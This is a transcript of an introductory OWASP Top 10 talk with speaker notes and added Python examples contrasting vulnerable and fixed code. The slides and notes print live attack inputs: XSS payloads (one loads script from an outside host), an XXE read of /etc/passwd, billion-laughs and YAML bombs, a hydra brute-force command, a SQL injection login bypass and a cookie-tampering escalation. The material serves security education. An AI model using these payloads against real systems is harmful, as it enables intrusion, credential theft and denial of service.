
OWASP TOP 10

The OWASP Top 10 is a list of the most prevalent security issues facing web developers today. In this talk, Robert will take you through all 10, demonstrate the problems (we will hack for real… in a safe way) and talk about the solutions. This is an introductory talk, so no prior experience in web development or security is needed. Not doing web dev? Many of these apply to all development! So join in for a lively session of demos, learning and fun.

Video of this talk: https://www.youtube.com/watch?v=p5YCHNnQNyg


  1. OWASP TOP 10: Setting the bar for security
  2. Hi. Robert MacLean, @rmaclean | sadev.co.za. DevConf | DevUG | Equal Experts. Cape Town, South Africa
  3. Mandatory hacker photo
  4. Content warning
     • Do not try this at home. Hacking is illegal without permission.
     • One demo contains F***
  5. What is OWASP?
     • Non-profit foundation for the improvement of the security of software
     • Join as a member to support them and get conference discounts
     • Local meetups available. Cape Town: meetup.com/en-AU/OWASP-Cape-Town-Chapter-Meetup
     • Produces tools (ZAP, Dependency-Check) and guidance
  6. OWASP TOP 10
     • Using the 2017 edition, as the next edition was still underway at the time of this talk
     • As it evolves, items are added, merged and removed
     • This is the bar for security
     • Focused on web security, but a lot is broadly applicable
     • 10 areas, each of which can be implemented and exploited in a variety of ways
     • Based on real-world feedback from OWASP members. See: owasp.org/www-project-top-ten
     • Each scored on four axes (scale 1 to 3): Attack Vector: Exploitability; Security Weakness: Prevalence; Security Weakness: Detectability; Impact: Technical
  7. OWASP TOP 10
     • 1. Injection
     • 2. Broken Authentication
     • 3. Sensitive Data Exposure
     • 4. XML External Entities (XXE)
     • 5. Broken Access Control
     • 6. Security Misconfiguration
     • 7. Cross-Site Scripting (XSS)
     • 8. Insecure Deserialization
     • 9. Using Components with Known Vulnerabilities
     • 10. Insufficient Logging & Monitoring
  8. Ten: Insufficient Logging & Monitoring
     • Not logging and auditing logins, failures and high-value transactions
     • Not enough information in what is logged
     • Logs only stored locally
     • Logs disabled, or configured so that pen tests never show up in them
     • Not alerting on logs and metrics
     Exploitability: 2 | Prevalence: 3 | Detectability: 1 | Technical: 2
  9. Nine: Using Components with Known Vulnerabilities
     • 3rd-party code runs with the same permissions as your own code
     • OS, database etc. all need to be checked too
     • Scan on a continuous basis
       • Library tools like OWASP Dependency-Check and npm audit
       • Container scanning
       • OS patching
     • Only obtain code from official sources
     Exploitability: 2 | Prevalence: 3 | Detectability: 2 | Technical: 2
  10. Eight: Insecure Deserialization
     • A specially crafted data structure causes the execution of code, or (as in the speaker's notes) changes application state the attacker should not control
     • Applies any time you deserialise data you did not produce yourself
     Exploitability: 1 | Prevalence: 2 | Detectability: 2 | Technical: 3
  11. Demo
  12. Eight: Insecure Deserialization
     • User input should not be trusted
     • Don't accept serialised data
       • If you must, encrypt and/or sign the payloads
     • Use safe deserialization options
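The speaker's notes for this slide describe a PHP forum whose session cookie is a serialised object that the client can rewrite to become admin. The following is an added example, not code from the talk: it reproduces that tampering on a JSON-encoded state cookie and then applies slide 12's remedy of signing the payload with an HMAC, so a modified cookie is rejected before anything is deserialised. The secret key, field names and user records are assumed values for the demonstration.

```python
import base64
import hashlib
import hmac
import json

# Assumed server-side secret for the demo; a real service loads it from a secret store.
SECRET_KEY = b"demo-key-replace-me"


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text.encode())


def encode_unsigned(state: dict) -> str:
    """The forum's design: the whole session state is handed to the client unprotected."""
    return _b64(json.dumps(state).encode())


def decode_unsigned(cookie: str) -> dict:
    """Deserialises whatever the client sends back and trusts it."""
    return json.loads(_unb64(cookie))


def encode_signed(state: dict, key: bytes = SECRET_KEY) -> str:
    """Same payload plus an HMAC-SHA256 tag over the exact bytes the client will return."""
    payload = _b64(json.dumps(state).encode())
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def decode_signed(cookie: str, key: bytes = SECRET_KEY):
    """Verify before you parse. Returns the state, or None if the cookie is malformed or was modified."""
    payload, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None
    return json.loads(_unb64(payload))


def tamper(cookie: str, **changes) -> str:
    """The attacker's edit from the speaker's notes: rewrite fields in the payload, keep any tag as-is."""
    payload, sep, tag = cookie.partition(".")
    state = json.loads(_unb64(payload))
    state.update(changes)
    return _b64(json.dumps(state).encode()) + sep + tag
```

Signing stops tampering but not reading: the state is still visible to the client, so a password hash stored in the cookie (as in the forum example) stays exposed, which is why the slide says encrypt and/or sign. The deeper fix is to keep the state server-side and hand the client only an opaque session identifier.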
  13. Seven: Cross-Site Scripting (XSS)
     • Reflected XSS: not validating input and returning it straight back to the user in the response
     • Stored XSS: not validating input, putting it in the DB and rendering it later
     • DOM XSS: client-side code writing attacker-controlled data (e.g. from an API response or the URL) into the page
     • Can lead to account takeovers, spam, multi-factor bypasses, key logging
     Exploitability: 3 | Prevalence: 3 | Detectability: 3 | Technical: 2
  14. Demo
  15. Demos
     <script>alert(`xss`)</script>
     <iframe src="javascript:alert(`xss`)">
     <<a|ascript>alert(`xss`)</script>
     <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
     /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
     &lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;
     _=`${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}${`${!![][~[]]}`[(!![]< <!![])|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<!![]]}${`${{}}`[!! []<<!![]<<!![]|!![]]}${`${![][~[]]}`[!{}<<![]]}${`${{}}`[!!{}<<![]]}${`${![][~[]]}`[!!{}<<![]]}`,__=`${`${ {}}`[!!{}<<![]]}${`${{}}`[!!{}<<!![]]}${`${!![][~[]]}`[[]<<[]]}${`${![][~[]]}`[!!{}<<!![]]}${`${!![][~[]]} `[(!![]<<!![])|!![]]}${`${{}}`[!![]<<!![]<<!![]|!![]]}${`${!![][~[]]}`[!!{}<<![]]}${`${![][~[]]}`[!{}<<![] ]}${`${[][~[]]}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}!`,[][_][_](`${`${{ }}`[!![]<<!![]<<!![]|!![]]}${`${{}}`[!!{}<<![]]}${`${[][~[]]}`[!!{}<<![]]}${`${!![][~[]]}`[(!![]<<!![])|!! []]}${`${{}}`[!!{}<<![]]}${`${!![][~[]]}`[!!{}<<!![]]}${`${![][~[]]}`[(!![]<<!![])|!![]]}${`${{}}`[[]<<[]] }'${`${!![][~[]]}`[!!{}<<!![]]}${`${{}}`[!!{}<<![]]}${`${``[_]}`[!![]<<!![]<<!![]<<!![]^!![]<<!![]<<!![]|! !{}<<!![]]}'${`${{}}`[!![]<<!![]<<!![]<<!![]^!![]<<!![]<<!![]|!!{}<<!![]]}(__)`)()
  16. Seven: Cross-Site Scripting (XSS)
     • User input should not be trusted
     • HTML-escape any dynamic content, in the way that is right for its context (text, attribute, CSS, etc.)
     • Use a safer format for input, say Markdown
     • Make use of HttpOnly cookies
     • Make use of CORS
     • Make use of CSP
     • Make use of audit tools
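Added example (not from the talk) of the reflected case and slide 16's first remedy: the same search template rendered once by string concatenation and once with HTML escaping, using two payloads from slide 15 plus one attribute-breakout string constructed here. The small inspector that approximates what a browser would execute is also part of the example, not of the original.

```python
import html
from html.parser import HTMLParser

# Two payloads from slide 15 plus one attribute-breakout string constructed for this example.
PAYLOADS = [
    "<script>alert(`xss`)</script>",
    '<iframe src="javascript:alert(`xss`)">',
    '" onmouseover="alert(1)',
]


def render_unsafe(query: str) -> str:
    """Reflected XSS: the search term is concatenated straight into the page, in two contexts."""
    return f'<p>Results for: {query}</p>\n<input name="q" value="{query}">'


def render_safe(query: str) -> str:
    """Same template with HTML escaping. quote=True turns '"' into &quot;, which is what keeps
    the attribute context closed; without it the third payload would still break out."""
    q = html.escape(query, quote=True)
    return f'<p>Results for: {q}</p>\n<input name="q" value="{q}">'


class ActiveContentInspector(HTMLParser):
    """Approximates what a browser would execute: script/iframe elements and on* event handlers."""

    def __init__(self):
        super().__init__()
        self.dangerous_tags = []
        self.event_handlers = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            self.dangerous_tags.append(tag)
        self.event_handlers += [name for name, _ in attrs if name.startswith("on")]


def active_content(rendered: str) -> dict:
    """Return the script-bearing tags and event-handler attributes a parser finds in the output."""
    insp = ActiveContentInspector()
    insp.feed(rendered)
    insp.close()
    return {"tags": insp.dangerous_tags, "handlers": insp.event_handlers}
```

Escaping is context-specific: the same payload needs different treatment inside a script block, a URL or a CSS value, which is what the slide means by "tags, attribute, css etc."; a template engine that escapes by default covers the common cases, and CSP limits the damage when one is missed.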
  17. Six: Security Misconfiguration
     • Unused ports and services running on machines
     • Default credentials
     • Error handling returning too much information
     • Using code with known issues
     Exploitability: 3 | Prevalence: 3 | Detectability: 3 | Technical: 2
  18. Demo
  19. Six: Security Misconfiguration
     • User input should not be trusted
     • Get security audits done
     • Go on security training
     • Automate checking of settings and code
     • Remove (or block) anything not needed
  20. Five: Broken Access Control
     • Authentication vs. authorization
     • Bypassing access checks by editing the URL, or anything else on the client side
     • IDORs (insecure direct object references)
     Exploitability: 2 | Prevalence: 2 | Detectability: 2 | Technical: 3
  21. Demo
  22. Five: Broken Access Control
     • User input should not be trusted
     • Deny by default
     • Rate limits
     • Disable web server directory listing
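Added example (not from the talk) of the IDOR in the speaker's notes for this slide, where the user id was taken from a query parameter, next to a deny-by-default version: identity comes from the server-side session, permissions are an allow list per role, and missing and forbidden orders get the same answer so ids cannot be enumerated. The orders, users and permission names are constructed for the demo.

```python
# Constructed demo data: customers own orders, one staff account is admin.
ORDERS = {
    1001: {"owner_id": 1, "item": "Apple Juice"},
    1002: {"owner_id": 2, "item": "Banana Juice"},
}
USERS = {1: "customer", 2: "customer", 9: "admin"}

# Allow list of permissions per role; anything not listed is denied.
PERMISSIONS = {
    "customer": {"order:read_own"},
    "admin": {"order:read_own", "order:read_any"},
}


class Forbidden(Exception):
    pass


def get_order_vulnerable(params: dict) -> dict:
    """IDOR: identity and object id both come from the query string, so ?userId=2&orderId=1002
    lets user 1 read user 2's order. The 'check' compares two attacker-controlled values."""
    order = ORDERS[int(params["orderId"])]
    if order["owner_id"] != int(params["userId"]):
        raise Forbidden("not your order")
    return order


def get_order_fixed(session_user_id: int, order_id: int) -> dict:
    """Deny by default: identity comes from the server-side session, and access needs an explicit grant.
    Missing and forbidden objects get the same response so ids cannot be enumerated."""
    order = ORDERS.get(order_id)
    granted = PERMISSIONS.get(USERS.get(session_user_id), set())
    if order is None:
        raise Forbidden("order not available")
    if "order:read_any" in granted or ("order:read_own" in granted and order["owner_id"] == session_user_id):
        return order
    raise Forbidden("order not available")


def can_read(session_user_id: int, order_id: int) -> bool:
    """Convenience wrapper: True if the fixed check grants access, False if it denies."""
    try:
        get_order_fixed(session_user_id, order_id)
        return True
    except Forbidden:
        return False
```

The shape matters more than the data: the vulnerable version has a check, it just checks the wrong thing. Put the authorization decision in one place that every handler calls, and test it with a second user's ids, which is exactly what the demo did with the query parameter.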
  23. Four: XML External Entities (XXE)
     • Untrusted XML is provided
       • e.g. SAML auth
     • The XML parser has lots of features, and those features are exploited
     Exploitability: 2 | Prevalence: 2 | Detectability: 3 | Technical: 3
  24. Demos
     <?xml version="1.0" encoding="ISO-8859-1"?>
     <!DOCTYPE foo [
       <!ELEMENT foo ANY >
       <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
     <foo>&xxe;</foo>

     <?xml version="1.0"?>
     <!DOCTYPE lolz [
       <!ENTITY lol "lol">
       <!ELEMENT lolz (#PCDATA)>
       <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
       <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
       <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
       <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
       <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
       <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
       <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
       <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
       <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
     ]>
     <lolz>&lol9;</lolz>
  25. Demos
     a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
     b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
     c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
     d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
     e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
     f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
     g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
     h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
     i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
     Expansion per level as annotated on the slide: 100, 1 000, 10 000, 100 000, 1 000 000, 10 000 000, 100 000 000, 1 BILLION (exact for the XML version, which uses ten references per level; this YAML version uses nine)
  26. Four: XML External Entities (XXE)
     • User input should not be trusted
     • Run static code analysis tools
     • Run dependency analysis tools
       • npm audit & yarn audit
       • Dependency-Check for the JVM
     • Upgrade SOAP to 1.2 or later
     • Disable features you do not need
       • XML external entities and DTDs in XML
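Added example (not from the talk) of slide 26's last remedy applied to the two slide-24 payloads: refuse any document that declares a DTD before parsing it, using the expat parser bundled with Python. Without a DTD there are no entities to declare, which removes both the file:///etc/passwd read and the billion-laughs chain (shortened to three levels here). The benign order document is constructed.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DtdNotAllowed(ValueError):
    pass


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    # Expat calls this at '<!DOCTYPE', before any entity in the internal subset is declared or expanded.
    raise DtdNotAllowed(f"document declares DOCTYPE {name!r}; DTDs are not accepted")


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Gate, then parse. A document with no DTD can declare no entities, so there is nothing that
    points at file:///etc/passwd and nothing to expand a billion times."""
    gate = expat.ParserCreate()
    gate.StartDoctypeDeclHandler = _reject_doctype
    gate.Parse(data, True)  # raises DtdNotAllowed on both slide-24 payloads
    return ET.fromstring(data)


def is_rejected(data: bytes) -> bool:
    """True if the document is refused (DTD present or not well-formed), False if it parses."""
    try:
        parse_untrusted_xml(data)
        return False
    except (DtdNotAllowed, ET.ParseError, expat.ExpatError):
        return True


# The two slide-24 payloads (the billion-laughs chain cut to three levels) and a constructed benign document.
XXE_PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>"""

LAUGHS_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> ]>
<lolz>&lol3;</lolz>"""

BENIGN = b"<order><cid>JS0815DE</cid><qty>2</qty></order>"
```

Most parsers expose this directly (lxml's XMLParser takes resolve_entities=False and load_dtd=False; Xerces-based Java parsers have the http://apache.org/xml/features/disallow-doctype-decl feature). The gate above is for parsers such as Python's ElementTree that give you no switch for DTDs. Rejecting the DOCTYPE outright also refuses legitimate documents that carry one, which is usually acceptable for an API, but check before applying it to SAML.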
  27. Three: Sensitive Data Exposure
     • Man-in-the-middle attacks
     • Stealing records off the server, or off the servers the data was sent through
     • Weak crypto
     • No hashing of passwords
     • Sharing data which should be private
     Exploitability: 2 | Prevalence: 3 | Detectability: 2 | Technical: 3
  28. Demo
  29. Three: Sensitive Data Exposure
     • Classify the data processed, stored and transmitted. Identify the risk for the business and in law (GDPR)
     • Only store information you must
     • Encrypt sensitive data at rest
     • Encrypt all data in transit
     • Disable caching of sensitive data
     • HSTS, with preload
  30. Two: Broken Authentication
     • Default admin accounts
     • Credential stuffing, brute force and dictionary attacks
     • Unexpired session tokens
     • Weak or ineffective forgot-password and recovery processes
     • Plaintext passwords instead of hashed passwords
     • Not invalidating session IDs
     Exploitability: 3 | Prevalence: 2 | Detectability: 2 | Technical: 3
  31. Demo
  32. Demos
     $ hydra -l admin@juice-sh.op -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-post-form '/#/login:email=^USER^&password=^PASS^:Invalid email or password.' -fV -s 3000 -t 1
  33. Two: Broken Authentication
     • Do not build your own auth unless you really need to; use what already exists and is well tested
     • Credential stuffing, brute force and dictionary attacks
       • Check passwords against haveibeenpwned.com/Passwords
       • Rate limits
     • Unexpired session tokens
     • Weak or ineffective forgot-password and recovery processes
       • Avoid knowledge questions
       • Do users need passwords at all?
       • Two-factor auth
     • Plaintext passwords
       • Just don't
     • Hash & salt passwords
       • Pick slow, salted algorithms designed for passwords (Argon2, scrypt, bcrypt, PBKDF2), not fast general-purpose hashes such as MD5 or SHA-1
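Added example (not from the talk) of the slide-33 remedies in Python: a slow salted password hash (PBKDF2-HMAC-SHA256 from the standard library, since Argon2 and bcrypt need third-party packages), a per-account lockout as the rate limit that would stop the hydra run on slide 32, and a k-anonymity breached-password check shaped like the haveibeenpwned.com/Passwords range API but answered from a constructed local list so it runs offline. It also records the login audit events that slide 8 says are usually missing. Account names, passwords, thresholds and the audit format are assumptions.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict

PBKDF2_ITERATIONS = 600_000  # OWASP's recommended minimum for PBKDF2-HMAC-SHA256
AUDIT_LOG = []               # stand-in for the structured audit trail slide 8 asks for


def audit(event: str, **fields) -> None:
    AUDIT_LOG.append({"event": event, "ts": time.time(), **fields})


def hash_password(password: str) -> str:
    """Slow, salted hash. The record carries its own parameters so they can be raised later."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)  # constant-time comparison


# Computed once so unknown accounts cost the same as wrong passwords (no user-enumeration timing oracle).
DUMMY_HASH = hash_password(os.urandom(8).hex())


def _sha1_upper(pw: str) -> str:
    return hashlib.sha1(pw.encode()).hexdigest().upper()


# Constructed stand-in for the Pwned Passwords range API: it returns every SHA-1 suffix sharing the
# five-character prefix you ask for, so the full hash of the candidate password never leaves the server.
BREACH_RANGES = defaultdict(list)
for _pw in ("123456", "password", "qwerty", "admin123"):
    _h = _sha1_upper(_pw)
    BREACH_RANGES[_h[:5]].append(_h[5:])


def is_breached(password: str, ranges=BREACH_RANGES) -> bool:
    h = _sha1_upper(password)
    return h[5:] in ranges.get(h[:5], [])


class LoginThrottle:
    """Per-account failure counter with a lockout window; the clock is injectable for tests."""

    def __init__(self, max_failures=5, lock_seconds=900, clock=time.monotonic):
        self.max_failures, self.lock_seconds, self.clock = max_failures, lock_seconds, clock
        self.failures = defaultdict(int)
        self.locked_until = {}

    def is_locked(self, account: str) -> bool:
        return self.locked_until.get(account, 0.0) > self.clock()

    def record_failure(self, account: str) -> None:
        self.failures[account] += 1
        if self.failures[account] >= self.max_failures:
            self.locked_until[account] = self.clock() + self.lock_seconds
            audit("account_locked", account=account, failures=self.failures[account])

    def record_success(self, account: str) -> None:
        self.failures.pop(account, None)
        self.locked_until.pop(account, None)


def login(users: dict, throttle: LoginThrottle, account: str, password: str) -> bool:
    """Authenticate with throttling and audit events. `users` maps account -> stored hash."""
    if throttle.is_locked(account):
        audit("login_blocked", account=account)
        return False
    stored = users.get(account)
    ok = verify_password(password, stored if stored is not None else DUMMY_HASH) and stored is not None
    if ok:
        throttle.record_success(account)
        audit("login_success", account=account)
    else:
        throttle.record_failure(account)
        audit("login_failure", account=account)
    return ok
```

A per-account lockout on its own invites denial of service against a victim's account and does nothing against credential stuffing spread over many accounts, so in practice it is combined with per-source-IP limits, CAPTCHAs after a few failures and alerting on the account_locked events; the breach check belongs at registration and password change, not only at login.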
  34. One: Injection
     • The attacker sends data to an interpreter to make it return the wrong answer, change settings they should not be able to, or escalate privileges
     • SQL injection is one vector, but the interpreter could be any database, environment variables, JSON, SOAP, XML, headers, cookies, etc.
     Exploitability: 3 | Prevalence: 2 | Detectability: 3 | Technical: 3
  35. Demo
  36. One: Injection
     • User input should not be trusted
     • Use parameterised queries for SQL
     • Avoid building strings in code from user input
     • Use allow lists to check content
     • "I use an ORM, so I am safe": by default most likely, but you should check
     • Use tools like ZAP to look for these
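Added example (not from the talk) of the injection demo from the speaker's notes, run against an in-memory SQLite database constructed here: the string-built login query accepts the payload 1' OR '1=1' -- from the notes, the parameterised version does not, and an ORDER BY column is checked against an allow list because identifiers cannot be bound as parameters. The emails are the ones the talk uses; the passwords and schema are demo values.

```python
import hashlib
import sqlite3


def md5_hex(text: str) -> str:
    # The demo app stores unsalted MD5 (the 32-hex value in the speaker's notes); mirrored here only so the
    # vulnerable query looks like the one in the notes. Not a password-hashing recommendation: see slide 33.
    return hashlib.md5(text.encode()).hexdigest()


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the Users table; passwords are demo values."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, password TEXT, role TEXT, deletedAt TEXT)"
    )
    db.executemany(
        "INSERT INTO Users VALUES (?, ?, ?, ?, ?)",
        [
            (1, "admin@juice-sh.op", md5_hex("demo-admin-password"), "admin", None),
            (2, "bjoern@juice-sh.op", md5_hex("demo-customer-password"), "customer", None),
        ],
    )
    return db


def login_vulnerable(db, email: str, password: str):
    """String-built query. With email = "1' OR '1=1' --" the WHERE clause becomes
    email = '1' OR '1=1' -- AND password = ... and everything after -- is a comment,
    so the first non-deleted row (the admin) comes back regardless of the password."""
    sql = (
        f"SELECT id, email, role FROM Users WHERE email = '{email}' "
        f"AND password = '{md5_hex(password)}' AND deletedAt IS NULL"
    )
    return db.execute(sql).fetchone()


def login_safe(db, email: str, password: str):
    """Parameterised query: values travel separately from the statement, so quotes in them are just data."""
    sql = "SELECT id, email, role FROM Users WHERE email = ? AND password = ? AND deletedAt IS NULL"
    return db.execute(sql, (email, md5_hex(password))).fetchone()


SORTABLE_COLUMNS = {"email", "role"}  # allow list for the one thing parameters cannot protect


def list_users_sorted(db, column: str):
    """Identifiers cannot be bound as parameters, so a user-chosen ORDER BY column is checked against an allow list."""
    if column not in SORTABLE_COLUMNS:
        raise ValueError(f"cannot sort by {column!r}")
    return db.execute(f"SELECT id, email FROM Users ORDER BY {column}").fetchall()
```

The same discipline applies to every interpreter on slide 34: pass user data through an API that keeps it separate from the instruction (bound parameters, argument arrays instead of shell strings, a JSON parser instead of eval), and where the language has no such channel, as with SQL identifiers, fall back to an allow list.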
  37. Done? No, this is the minimum bar
     • Join your local OWASP group
     • Run your checks all the time
     • Get a red team
     • Practice incidents
     • Secure by default is a great first principle
  38. Thank You. Robert MacLean, robert@sadev.co.za

Editor's Notes

  • Photo by Francois Hoang on Unsplash
  • Photo by Andrew Haimerl on Unsplash
  • Photo by Luther Bottrill on Unsplash
  • Photo by Emre Karataş on Unsplash
  • Photo by Levon Vardanyan on Unsplash
  • Photo by Austrian National Library on Unsplash
  • http://www.appsensor.org/
  • Leonard H. Courtney \ Lies — damned lies — and statistics \ The price of peace is eternal vigilance

  • A PHP forum uses PHP object serialization to save a "super" cookie containing the user's user ID, role, password hash and other state:
      a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
    An attacker changes the serialized object to give themselves admin privileges:
      a:4:{i:0;i:1;i:1;s:5:"Alice";i:2;s:5:"admin";i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}
  • Photo by Denny Ryanto on Unsplash

    https://juice-shop.herokuapp.com/api-docs/

    {
    "cid": "JS0815DE",
    "orderLines": [{
    "product": "(function dos() { while(true); })()"
    }]
    }

    var x = 'var y = {"name":(function hi() { console.log(1) })()}'

    JSON.parse(x)
    eval(x)
  • Photo by kevin laminto on Unsplash

    Talk about alert
    Try search for <script>alert("1")</script>
    Show network tab is filtering it out… smart
    <iframe src="javascript:alert(`xss`)">
  • https://github.com/ihebski/XSS-Payloads
    http://www.jsfuck.com/
  • Directory listing is not disabled on the server. An attacker discovers they can simply list directories. The attacker finds and downloads the compiled Java classes, which they decompile and reverse engineer to view the code. The attacker then finds a serious access control flaw in the application.
  • Photo by JJ Ying on Unsplash

    https://obscure-chamber-62037.herokuapp.com/#/deluxe-membership
  • Photo by Victor Li on Unsplash

    Just go to https://juice-shop.herokuapp.com/ftp
    Tell story about query param for user ID
  • Photo by Oleksandr Zhabin on Unsplash

    https://juice-shop.herokuapp.com/admin#/saved-payment-methods

    Show how credit card number is in network tab
  • Photo credit https://www.flickr.com/photos/bookcatalog/27162728588
  • Photo by Alexander Popov on Unsplash

    bjoern@juice-sh.op & West-2082

    https://juice-shop.herokuapp.com/admin#/forgot-password
  • https://tools.kali.org/password-attacks/hydra

    rockyou.txt contains 14,341,564 unique passwords, used in 32,603,388 accounts.

    https://www.kaggle.com/wjburns/common-password-list-rockyoutxt
  • Photo by Levon Vardanyan on Unsplash

    https://juice-shop.herokuapp.com/#/
    Make sure to open network diagnostic
    Try quote for email and show error
    Talk about limiting errors back to users
    Then use a single quote for the email
    1' OR '1=1' --
    SELECT * FROM Users WHERE email = '1' OR '1=1' -- AND password = 'a8f5f167f44f4964e6c998dee827110c' AND deletedAt IS NULL
  • https://mybroadband.co.za/news/security/179064-ethekwini-municipality-leaking-private-details-of-over-300000-residents.html
  • Photo by Victor Rodriguez on Unsplash

  • Photo by Jonathan Formento on Unsplash